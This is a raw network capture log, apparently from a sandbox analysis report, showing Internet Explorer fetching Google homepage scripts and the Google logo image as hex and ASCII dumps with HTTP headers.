2021-09-14 14:03:24 UTC	155	IN	Data Raw: 5c 78 33 64 72 65 73 74 61 75 72 61 6e 74 73 2b 6e 65 61 72 62 79 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 68 75 6e 67 72 79 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 48 75 6e 67 72 79 5c 78 32 32 7d 2c 7b 5c 78 32 32 68 72 65 66 5c 78 32 32 3a 5c 78 32 32 2f 73 65 61 72 63 68 3f 67 77 73 5f 72 64 5c 78 33 64 73 73 6c 5c 5c 75 30 30 32 36 71 5c 78 33 64 66 6c 69 70 2b 61 2b 63 6f 69 6e 5c 5c 75 30 30 32 36 63 73 66 5c 78 33 64 62 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 61 64 76 65 6e 74 75 72 6f 75 73 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 41 64 76 65 6e 74 75 72 6f 75 73 5c 78 32 32 Data Ascii: \x3drestaurants+nearby\x22,\x22id\x22:\x22hungry\x22,\x22msg\x22:\x22I\x27m Feeling Hungry\x22},{\x22href\x22:\x22/search?gws_rd\x3dssl\\u0026q\x3dflip+a+coin\\u0026csf\x3db\x22,\x22id\x22:\x22adventurous\x22,\x22msg\x22:\x22I\x27m Feeling Adventurous\x22
2021-09-14 14:03:24 UTC	156	IN	Data Raw: 77 30 68 58 67 7a 44 4d 54 78 36 36 75 6e 5a 61 4e 38 41 4e 4a 48 41 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 74 72 65 6e 64 79 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 54 72 65 6e 64 79 5c 78 32 32 7d 2c 7b 5c 78 32 32 68 72 65 66 5c 78 32 32 3a 5c 78 32 32 2f 75 72 6c 3f 75 72 6c 5c 78 33 64 68 74 74 70 73 3a 2f 2f 61 72 74 73 61 6e 64 63 75 6c 74 75 72 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 61 72 74 6e 65 72 2f 6d 75 73 65 6f 2d 72 65 69 6e 61 2d 73 6f 66 69 61 5c 5c 75 30 30 32 36 73 61 5c 78 33 64 74 5c 5c 75 30 30 32 36 75 73 67 5c 78 33 64 41 4f 76 56 61 77 33 53 39 58 70 41 65 49 4c 6e 51 7a 5a 54 63 63 70 31 62 41 50 6c 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 Data Ascii: w0hXgzDMTx66unZaN8ANJHA\x22,\x22id\x22:\x22trendy\x22,\x22msg\x22:\x22I\x27m Feeling Trendy\x22},{\x22href\x22:\x22/url?url\x3dhttps://artsandculture.google.com/partner/museo-reina-sofia\\u0026sa\x3dt\\u0026usg\x3dAOvVaw3S9XpAeILnQzZTccp1bAPl\x22,\x22id\x
2021-09-14 14:03:24 UTC	157	IN	Data Raw: 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 31 2c 31 2c 30 2c 6e 75 6c 6c 2c 5c 78 32 32 5c 78 32 32 2c 30 5d 27 5d 3b 0a 76 61 72 20 61 3d 6d 3b 77 69 6e 64 6f 77 2e 57 5f 6a 64 3d 77 69 6e 64 6f 77 2e 57 5f 6a 64 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 3d 32 29 77 69 6e 64 6f 77 2e 57 5f 6a 64 5b 61 5b 62 5d 5d 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 61 5b 62 2b 31 5d 29 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 3d 7b 22 53 30 36 47 72 62 22 3a 22 22 2c 22 7a 43 68 4a 6f 64 22 3a 22 25 2e 40 2e 5d 22 2c 22 53 4e 6c 4d 30 65 22 3a 22 22 2c 22 77 32 62 74 41 65 22 3a 22 25 2e 40 2e 5c 22 5c 22 2c Data Ascii: null,null,null,null,0,null,1,1,0,null,\x22\x22,0]'];var a=m;window.W_jd=window.W_jd\|\|{};for(var b=0;b<a.length;b+=2)window.W_jd[a[b]]=JSON.parse(a[b+1]);})();(function(){window.WIZ_global_data={"S06Grb":"","zChJod":"%.@.]","SNlM0e":"","w2btAe":"%.@.\"\",
2021-09-14 14:03:24 UTC	159	IN	Data Raw: 22 23 64 61 64 63 65 30 22 2c 22 23 30 30 30 22 2c 22 23 64 61 64 63 65 30 22 2c 22 23 30 30 30 22 2c 22 23 31 61 37 33 65 38 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 36 29 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 34 29 22 2c 22 72 67 62 61 0d 0a Data Ascii: "#dadce0","#000","#dadce0","#000","#1a73e8",false,false,false,false,false,false,true,false,false,false,false,false,"rgba(0,0,0,.12)","rgba(0,0,0,.26)","rgba(0,0,0,.54)","rgba
2021-09-14 14:03:24 UTC	159	IN	Data Raw: 32 32 34 31 0d 0a 28 30 2c 30 2c 30 2c 2e 38 37 29 22 2c 22 72 67 62 61 28 32 30 34 2c 32 30 34 2c 32 30 34 2c 2e 31 35 29 22 2c 22 72 67 62 61 28 32 30 34 2c 32 30 34 2c 32 30 34 2c 2e 32 35 29 22 2c 22 72 67 62 61 28 31 31 32 2c 31 31 37 2c 31 32 32 2c 2e 32 30 29 22 2c 22 72 67 62 61 28 31 31 32 2c 31 31 37 2c 31 32 32 2c 2e 34 30 29 22 2c 22 23 34 32 38 35 66 34 22 2c 22 23 31 35 35 38 64 36 22 2c 22 23 33 34 61 38 35 33 22 2c 22 23 65 61 34 33 33 35 22 2c 22 23 66 62 62 63 30 34 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 37 30 37 35 37 61 22 2c 22 23 32 30 32 31 32 34 22 2c 22 23 33 34 61 38 35 33 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 22 2c 22 23 33 32 33 32 33 32 22 2c 22 23 Data Ascii: 2241(0,0,0,.87)","rgba(204,204,204,.15)","rgba(204,204,204,.25)","rgba(112,117,122,.20)","rgba(112,117,122,.40)","#4285f4","#1558d6","#34a853","#ea4335","#fbbc04","#f8f9fa","#f8f9fa","#f8f9fa","#70757a","#202124","#34a853","rgba(0,0,0,.12)","#323232","#
2021-09-14 14:03:24 UTC	160	IN	Data Raw: 5c 22 23 66 66 66 5c 22 2c 5c 22 23 31 61 37 33 65 38 5c 22 2c 5c 22 23 64 31 64 31 64 31 5c 22 2c 5c 22 23 66 66 66 5c 22 2c 6e 75 6c 6c 2c 31 2c 6e 75 6c 6c 2c 31 34 2c 35 30 30 2c 5c 22 23 31 39 36 37 64 32 5c 22 2c 5c 22 34 70 78 5c 22 2c 5c 22 23 31 61 37 33 65 38 5c 22 2c 5c 22 23 65 65 65 65 65 65 5c 22 5d 22 2c 6e 75 6c 6c 2c 22 25 2e 40 2e 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 5d 2c 30 2c 6e 75 6c 6c 2c 30 2c 30 5d 22 2c 22 65 6e 2d 47 42 22 2c 22 25 2e 40 2e 5c 22 31 33 70 78 5c 22 2c 5c 22 31 36 70 78 5c 22 2c 5c 22 31 31 70 78 5c 22 5d 22 2c 22 25 2e 40 2e 5c 22 31 30 70 78 5c 22 2c 31 30 2c 5c 22 31 36 70 78 5c 22 2c 31 36 5d 22 2c 22 25 2e 40 2e 5c 22 31 34 70 78 5c 22 2c 31 34 5d 22 2c 22 25 2e 40 2e 34 30 5d 22 2c 6e 75 6c 6c 2c 22 25 2e 40 Data Ascii: \"#fff\",\"#1a73e8\",\"#d1d1d1\",\"#fff\",null,1,null,14,500,\"#1967d2\",\"4px\",\"#1a73e8\",\"#eeeeee\"]",null,"%.@.[null,null,1],0,null,0,0]","en-GB","%.@.\"13px\",\"16px\",\"11px\"]","%.@.\"10px\",10,\"16px\",16]","%.@.\"14px\",14]","%.@.40]",null,"%.@
2021-09-14 14:03:24 UTC	161	IN	Data Raw: 61 28 36 30 2c 36 34 2c 36 37 2c 30 2e 32 34 29 5c 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 31 70 78 20 73 6f 6c 69 64 20 20 23 64 61 64 63 65 30 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 5d 22 2c 22 25 2e 40 2e 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6d 65 64 69 75 6d 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6d 65 64 69 75 6d 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6c 69 67 68 74 2c Data Ascii: a(60,64,67,0.24)\",null,null,\"1px solid #dadce0\",\"none\",\"none\",\"none\"]","%.@.\"Google Sans,arial,sans-serif\",\"Google Sans,arial,sans-serif-medium,sans-serif\",\"arial,sans-serif\",\"arial,sans-serif-medium,sans-serif\",\"arial,sans-serif-light,
2021-09-14 14:03:24 UTC	163	IN	Data Raw: 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 33 32 70 78 5c 22 2c 5c 22 32 34 70 78 5c 22 2c 6e 75 6c 6c 2c 5c 22 35 30 30 5c 22 5d 22 2c 22 25 2e 40 2e 34 5d 22 2c 22 25 2e 40 2e 5c 22 31 34 70 78 5c 22 2c 31 34 2c 5c 22 31 36 70 78 5c 22 2c 31 36 2c 5c 22 30 5c 22 2c 30 2c 5c 22 6e 6f 6e 65 5c 22 2c 36 33 32 2c 5c 22 31 70 78 20 73 6f 6c 69 64 20 23 64 66 65 31 65 35 5c 22 2c 5c 22 6e 6f 72 6d 61 6c 5c 22 2c 5c 22 6e 6f 72 6d 61 6c 5c 22 2c 5c 22 23 37 30 37 35 37 61 5c 22 2c 5c 22 31 32 70 78 5c 22 2c 5c 22 31 2e 33 34 5c 22 2c 5c 22 31 70 78 20 73 6f 6c 69 64 20 23 64 66 65 31 65 35 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 30 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e Data Ascii: ogle Sans,arial,sans-serif\",\"32px\",\"24px\",null,\"500\"]","%.@.4]","%.@.\"14px\",14,\"16px\",16,\"0\",0,\"none\",632,\"1px solid #dfe1e5\",\"normal\",\"normal\",\"#70757a\",\"12px\",\"1.34\",\"1px solid #dfe1e5\",\"none\",\"0\",\"none\",\"none\",\"non
2021-09-14 14:03:24 UTC	164	IN	Data Raw: 38 34 31 2c 34 30 32 30 2c 39 37 38 2c 31 33 32 32 38 2c 33 38 34 37 2c 33 37 37 36 2c 34 31 36 2c 36 34 33 34 2c 33 39 33 30 2c 34 34 38 2c 31 32 2c 38 36 36 2c 31 32 2c 35 2c 37 2c 31 33 37 36 33 2c 31 33 2c 32 37 36 32 2c 39 31 39 2c 35 30 38 31 2c 36 32 2c 31 35 33 31 2c 31 32 37 39 2c 32 32 31 32 2c 35 33 30 2c 31 34 39 2c 31 31 30 33 2c 38 34 30 2c 32 31 39 36 2c 34 31 30 31 2c 31 30 39 2c 32 30 30 33 2c 31 34 30 32 2c 36 30 36 2c 32 30 32 35 2c 31 37 37 35 2c 35 32 30 2c 35 37 36 36 2c 32 35 37 2c 36 30 37 30 2c 32 35 37 37 2c 33 32 32 37 2c 32 38 34 35 2c 37 2c 34 38 30 38 2c 37 39 31 2c 36 37 35 35 2c 35 30 39 36 2c 37 35 34 30 2c 33 37 39 39 2c 34 39 38 31 2c 39 30 38 2c 32 2c 39 34 31 2c 32 36 31 34 2c 33 37 38 33 2c 39 33 35 39 2c 33 2c 35 37 Data Ascii: 841,4020,978,13228,3847,3776,416,6434,3930,448,12,866,12,5,7,13763,13,2762,919,5081,62,1531,1279,2212,530,149,1103,840,2196,4101,109,2003,1402,606,2025,1775,520,5766,257,6070,2577,3227,2845,7,4808,791,6755,5096,7540,3799,4981,908,2,941,2614,3783,9359,3,57
2021-09-14 14:03:24 UTC	165	IN	Data Raw: 2c 32 2c 32 2c 34 2c 32 2c 33 2c 33 2c 32 36 39 2c 35 32 30 2c 32 2c 32 32 2c 33 2c 34 2c 33 2c 32 33 36 35 34 33 30 33 2c 32 39 39 38 36 35 2c 34 30 34 31 33 35 32 2c 33 33 38 2c 33 2c 32 34 31 34 2c 34 34 38 2c 32 2c 34 36 33 2c 31 37 32 2c 34 30 36 2c 39 2c 33 32 33 35 2c 31 32 35 2c 31 31 35 33 2c 32 36 32 2c 39 32 36 2c 38 31 32 27 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 3d 27 2f 78 6a 73 2f 5f 2f 6a 73 2f 6b 5c 78 33 64 78 6a 73 2e 73 2e 65 6e 5f 47 42 2e 66 6a 6a 5f 46 7a 68 6b 75 4b 41 2e 4f 2f 61 6d 5c 78 33 64 52 4b 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 46 51 41 59 51 43 41 41 41 41 44 41 44 43 41 41 41 41 41 41 41 41 43 41 41 41 68 49 50 4a 69 51 41 41 41 41 43 41 4d 69 38 46 44 41 41 41 41 41 43 67 41 Data Ascii: ,2,2,4,2,3,3,269,520,2,22,3,4,3,23654303,299865,4041352,338,3,2414,448,2,463,172,406,9,3235,125,1153,262,926,812';})();(function(){var u='/xjs/_/js/k\x3dxjs.s.en_GB.fjj_FzhkuKA.O/am\x3dRKAAAAEAAAAAAAAAAAAFQAYQCAAAADADCAAAAAAAACAAAhIPJiQAAAACAMi8FDAAAAACgA
2021-09-14 14:03:24 UTC	167	IN	Data Raw: 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 61 2c 22 73 63 72 69 70 74 5b 6e 6f 6e 63 65 5d 22 29 29 3f 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 7c 7c 22 22 3a 22 22 29 26 26 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 64 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 3b 67 6f 6f 67 6c 65 2e 70 73 61 3d 21 30 7d 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 28 29 7d 2c 30 29 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 78 6a 73 75 3d 27 2f 78 6a 73 2f 5f 2f 6a 73 2f 6b 5c 78 33 64 78 6a 73 2e 73 2e 65 6e 5f 47 42 2e 66 6a 6a Data Ascii: \|void 0===d?void 0:d.call(a,"script[nonce]"))?b.nonce\|\|b.getAttribute("nonce")\|\|"":"")&&c.setAttribute("nonce",d);document.body.appendChild(c);google.psa=!0};setTimeout(function(){m()},0);})();(function(){window.google.xjsu='/xjs/_/js/k\x3dxjs.s.en_GB.fjj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49752	142.250.102.106	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:03:24 UTC	167	OUT	GET /images/branding/googlelogo/2x/googlelogo_color_272x92dp.png HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.google.com/?gws_rd=ssl Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: www.google.com Connection: Keep-Alive Cookie: CONSENT=PENDING+509
2021-09-14 14:03:24 UTC	168	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/png Cross-Origin-Resource-Policy: cross-origin Content-Length: 13504 Date: Tue, 14 Sep 2021 14:03:24 GMT Expires: Tue, 14 Sep 2021 14:03:24 GMT Cache-Control: private, max-age=31536000 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-09-14 14:03:24 UTC	168	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 20 00 00 00 b8 08 06 00 00 00 da 23 57 1b 00 00 34 87 49 44 41 54 78 01 ec dd 03 90 25 3f 1e c0 f1 9c 6d db b6 7d af 93 c1 d9 28 9d 59 3a 9b af 6e 92 f4 7a ff b6 6d db b6 ed fb db 77 83 24 3d eb d7 97 9c d7 bb f3 5e bf 99 e9 fe 4e d5 67 8d 9e d2 7c ab 93 5f 22 f8 58 fd a3 d5 2e 1f fd e9 76 f9 c4 c1 b9 a3 4f 1b 5a d0 79 d2 bb 76 2a 1f 23 ca f2 11 91 00 80 1e 01 d0 94 4f 34 85 84 1c f1 6f 52 d6 7d 59 e6 e1 97 ca 86 ed 94 f5 c7 66 d6 5f 94 69 7f 5b a6 c3 78 66 dd 2a 65 43 b9 6e 6e 49 74 9f b4 e1 ea e8 0c a9 c3 01 ca f8 39 ca 16 3f 94 79 18 6e cd 2d 5e dc e0 50 01 00 80 00 69 b7 cb 47 a6 d8 90 36 7c 5f 5a bf 87 32 ee ca cc ba 65 29 24 2a a5 c3 68 74 a6 32 61 b1 b4 ee 8b ca fa e7 45 62 75 00 00 a0 36 9f Data Ascii: PNGIHDR #W4IDATx%?m}(Y:nzmw$=^Ng\|_"X.vOZyv#O4oR}Yf_i[xfeCnnIt9?yn-^PiG6\|_Z2e)$*ht2aEbu6
2021-09-14 14:03:24 UTC	169	IN	Data Raw: e7 8c 3f 43 59 7f c1 ec f9 e2 ed 83 32 ee 7e 69 c3 cd d2 b8 cb e3 f7 e7 28 eb cf 53 d6 5d 92 ee 68 49 bf a7 b4 5b 3e 0b 22 64 a5 cc c3 d7 23 01 00 35 46 80 ac 8d 00 51 d6 3f 2f d3 e1 aa 19 38 39 b2 3c d3 fe fc 74 b2 a8 cc c3 2f 95 29 3e 13 a7 72 5e fb ae 9d ca c7 44 62 63 d2 f8 70 3a 91 34 6d a6 95 d6 7f 55 1a ff 97 e8 88 34 16 3b 83 46 74 0b 46 74 01 34 00 01 b2 3a 02 a4 35 3f 3c 3f 6d 8a 9c 21 5f 8c 57 65 d6 5f a4 8c 9f 23 f3 30 9c 96 84 22 d1 6b 29 4c a4 9e 7c 59 7a f3 a0 74 d8 2f ed c7 20 3e 00 80 00 41 9f 02 64 a8 ed 9f 9b 96 2b a6 7f 34 d5 5d ae 8c ff 69 7a 9e 48 f4 5b da 78 2b b5 57 d2 fa 5d 32 1b 26 88 8f d5 01 00 01 82 9e ee f9 98 ce 65 97 4c 87 71 a9 c3 c2 81 11 ff 96 48 cc 14 e9 ad 8b cc c3 b7 53 14 11 1f 00 40 80 f4 10 01 d2 6a 97 8f 57 36 9c Data Ascii: ?CY2~i(S]hI[>"d#5FQ?/89<t/)>r^Dbcp:4mU4;FtFt4:5?<?m!_We_#0"k)L\|Yzt/ >Ad+4]izH[x+W]2&eLqHS@jW6
2021-09-14 14:03:24 UTC	170	IN	Data Raw: 44 6b 0f e7 df 02 01 20 5f 6e ba ac db d3 5a 73 38 02 87 eb 10 48 bc 8d a0 e2 1b 7c 9f d7 c0 c7 e2 63 f2 b1 f9 37 f8 b7 40 00 c8 17 9f ba 78 db ba c6 f4 05 08 38 1e c1 18 bb 50 67 ac 4e bf 81 c7 6b 62 7f 2e 67 54 a9 f6 2b a1 a6 22 c1 9d 30 26 fd 02 e3 dc 0c 04 1a 69 a5 31 0e 02 ed c9 48 e0 6f a9 58 e8 84 72 8f 6f c2 03 d5 5f 92 5b 8b 0d e2 b4 03 90 70 63 77 10 c4 e7 1b 0c ce 4c 60 a6 e2 34 cc 5e 4c 87 e5 3c 91 ec 80 3b 88 65 1d d1 e0 a3 c9 58 ed 29 ed f5 7b ac 05 52 89 38 33 b1 a2 a5 fa d4 65 2d d5 8f 21 48 58 c6 60 c1 0e fc 5b f0 28 fe f6 29 b9 99 b2 16 48 25 62 6b 8c 48 53 fa 7c cc 74 3c cf 71 d5 b0 77 d1 05 fd c7 63 a7 a5 d6 01 e9 87 76 c7 74 29 81 e7 02 90 ce fd 46 6d 81 d9 8a df f3 26 c8 96 31 0e 33 c2 b8 d9 ba 37 19 0f ed 97 6f 90 ff 01 b1 13 0f 84 Data Ascii: Dk _nZs8H\|c7@x8PgNkb.gT+"0&i1HoXro_[pcwL`4^L<;eX){R83e-!HX`[()H%bkHS\|t<qwcvt)Fm&137o
2021-09-14 14:03:24 UTC	172	IN	Data Raw: 03 10 14 45 aa 03 19 2c 64 4d ff 90 0d dd fc 00 64 b5 2c 72 b4 fd 07 b1 03 db e4 eb 37 8f 73 75 4e c8 52 b6 fd 07 b1 0b fb a9 f8 81 85 f7 03 10 b6 bb af d8 71 0d 5d c9 07 52 7a 40 58 2e 5d ff 43 94 3e 1a c4 c5 2a 3e 00 61 ef 07 90 c1 58 10 0f 6c 8b 0f 67 0a f2 be d5 05 3a e6 87 6b b7 06 31 29 37 63 d8 36 b8 e0 76 fa 81 c7 9a 05 cb 72 4f 0e df 1a c4 34 b4 cd 3f ca 0f 2a bc 1f 80 e0 bc fe 01 64 2a 7c 5c bb 03 a4 14 12 49 2c 1a ab 5f 03 24 bb 3f 88 9b f9 01 48 a6 11 64 a0 b8 05 0d 33 1f 2f 97 b1 84 f0 6c 2c fd cc 40 d9 e3 9b 50 04 a8 11 11 fa 1f 89 df f3 67 28 9d 3e 13 bf 33 a7 7c 77 0c c1 17 99 ac 06 62 c4 ab 52 8d f2 e4 2f 95 31 e9 73 36 82 9f 19 2c ef 8e e7 d1 88 04 d8 3f 12 bf e7 cf d0 d6 7f 26 7e 67 4e 19 03 91 17 f9 1e 81 98 12 9b bc e8 07 56 8b 8b 32 Data Ascii: E,dMd,r7suNRq]Rz@X.]C>>aXlg:k1)7c6vrO4?d*\|\I,_$?Hd3/l,@Pg(>3\|wbR/1s6,?&~gNV2
2021-09-14 14:03:24 UTC	173	IN	Data Raw: c0 34 e1 5f 40 dc cb 9f 01 81 85 20 45 32 b6 ed 96 bb 5c e6 c4 42 1b 81 38 c1 bc fd f7 da 04 77 29 1f 19 da 96 3b c9 71 db 6e b1 cb 25 d7 22 1b 81 38 c2 74 d9 04 4b 32 1f 19 9a 09 99 04 32 10 13 ee ce 57 21 10 ff 84 e7 8e 57 5b 5b f0 35 a2 af d3 c3 95 1e 80 60 e9 60 a4 d7 7a 45 59 38 fb a2 3c a3 f3 71 a1 a5 24 1e 44 bd 58 4e 22 fb 77 10 57 f3 67 40 3a 41 8a 31 f7 e0 c0 08 66 6b 1b 48 64 ea e4 d2 07 88 93 b0 d0 8f 89 d7 8b 29 d0 af 07 92 5c cb 84 50 e4 31 7c 6d 20 37 a2 93 4b 1f 20 0e f3 3d 14 32 5b 60 e0 f5 7e 3d d0 e4 da ba c6 ee c3 4c 9c 87 2c 1a 06 e2 14 63 a7 a5 d6 c1 f3 fa b0 92 03 10 2c 35 df 68 20 00 b9 06 a4 7c ac 65 98 e0 58 e4 f1 f5 e8 be b6 da 83 40 7a c3 83 30 ab 5a b9 14 fb 2b 7e 29 76 b7 4b cf 03 29 06 4e c8 53 4d ec 76 c1 45 3e 0e e2 44 3c Data Ascii: 4_@ E2\B8w);qn%"8tK22W!W[[5``zEY8<q$DXN"wWg@:A1fkHd)\P1\|m 7K =2[`~=L,c,5h \|eX@z0Z+~)vK)NSMvE>D<
2021-09-14 14:03:24 UTC	174	IN	Data Raw: 52 08 3b df 56 f2 f2 8b a5 3e b1 64 07 af 07 20 0c 18 34 67 06 b8 6c 0b 52 0a 26 95 62 8c f9 21 12 4a ff a5 5f ad 54 65 a7 cb d3 d8 15 78 6c 29 e3 b8 f0 40 9c 4e 44 34 db ae be 1d 37 91 39 16 c4 2c 1f 06 c3 9f 29 16 21 cb f2 f3 00 d2 17 56 ee 63 cd 0a c5 0f 70 33 88 9b f1 04 d4 ec 8a 99 0f 04 aa 41 7a 83 1a 18 43 59 b3 42 31 f1 b2 19 c4 cd 34 0b b2 21 98 59 91 7f 55 aa 41 fa 82 04 d4 49 ca 63 65 1c c4 6d 58 74 b2 ae 31 3d d7 d3 01 48 34 74 96 e2 2e b7 0f 41 8a c5 26 71 c8 3f 39 1f cf e1 1d 07 06 1d 69 7c bd b6 bd 3e b8 1b 48 a9 78 b0 f0 84 ba 4d 3b 00 61 f3 22 10 b3 7c 78 af ef b5 b3 94 3e fb a1 28 6f 49 6b 04 71 33 b6 d4 87 bc 96 42 7d 70 d8 0f 45 b9 f2 69 23 88 cb 5d a2 f9 9e f4 d7 07 47 3b 6f ce cd 49 fb b8 01 7a c8 cb 01 08 97 14 14 8b 8f 3d 0c d2 9f Data Ascii: R;V>d 4glR&b!J_Texl)@ND479,)!Vcp3AzCYB14!YUAIcemXt1=H4t.A&q?9i\|>HxM;a"\|x>(oIkq3B}pEi#]G;oIz=
2021-09-14 14:03:24 UTC	175	IN	Data Raw: 13 ec 04 53 b3 20 6c e1 6c f5 1b 29 99 0f 6d c0 d3 af 29 57 ac 9d 37 e1 ee 7c 15 48 31 90 b7 b1 b7 6e d5 cf e0 39 20 6e 86 d7 f1 13 c8 6b 99 1f 0d d4 82 f4 06 cb 00 7b eb 2e 37 54 9f 03 e2 6e 43 7e a2 bc 0b a6 16 a4 2f 8a 95 50 21 fd 25 88 5b e1 5a 31 d5 d3 01 48 2c 78 a9 0b 82 8e 2c ab ac 76 44 47 ef 01 e2 06 05 ff 23 2f 48 f8 3f f9 5d c8 9b 80 3b e9 5f 80 94 c6 87 d9 8f d3 f5 67 a5 b2 97 83 14 8b 85 c3 94 b7 9c 5e 0f e2 66 2c d7 ac bb 2c b5 f7 a6 20 bd 61 e1 30 cd 8b 2d 5c 0f e2 6e 55 b7 a9 d6 46 99 29 9b 82 f4 05 77 fd 7f d3 3c 07 dd 5c ac 91 b9 7d 5e 0e 40 f4 6e 2e f4 25 63 81 f7 30 43 73 e1 fc fd 6b d7 05 71 13 1e 0a 8a 36 75 1f 6e 2c 17 24 91 5e 8e 7c 86 5a 90 e2 f8 c2 0d e9 8d f1 de a5 0c f4 ec d9 05 a4 58 4c 64 c2 16 ae c5 7a 01 48 e0 0d 10 37 53 Data Ascii: S ll)m)W7\|H1n9 nk{.7TnC~/P!%[Z1H,x,vDG#/H?];_g^f,, a0-\nUF)w<\}^@n.%c0Cskq6un,$^\|ZXLdzH7S
2021-09-14 14:03:24 UTC	177	IN	Data Raw: 57 f3 af 4a 35 88 13 e5 a6 cb 50 bc ee 77 d4 5f 37 66 54 40 4a c1 59 61 13 37 0c 98 59 09 83 38 11 b6 de de c1 e7 58 69 01 c8 ac 31 63 86 1b d9 8e 1b 09 fd 10 c4 b1 62 a1 1f ac 76 a3 99 49 45 03 e7 2a cc 86 e0 30 40 d8 86 39 ac 70 37 56 fd bc 10 b6 7c 06 f1 a2 d8 94 ec 48 2c 8b bc 67 fa 7d c4 df 98 cf 6a aa 20 5a d8 17 c6 50 27 c7 8b 41 9c a7 97 c4 53 bd 9e 38 21 90 52 58 7d 61 0c b8 18 c4 89 ac c4 53 6d 78 2f 43 20 a5 42 32 e6 83 06 9a 76 ce e6 4c 03 88 b3 64 0f e6 f3 ab c4 00 84 b0 f4 7a a3 81 00 e4 b3 d4 d8 b1 eb 80 38 d0 3a 58 2a 7a 77 8d e7 ac 30 1b c2 c3 80 31 f2 b7 76 68 d8 b4 24 93 43 bd 90 1b ac 9e 09 5e c0 5d 28 78 6d 13 59 96 de 8e f7 10 59 fb 47 82 68 62 24 cc ad 63 66 b2 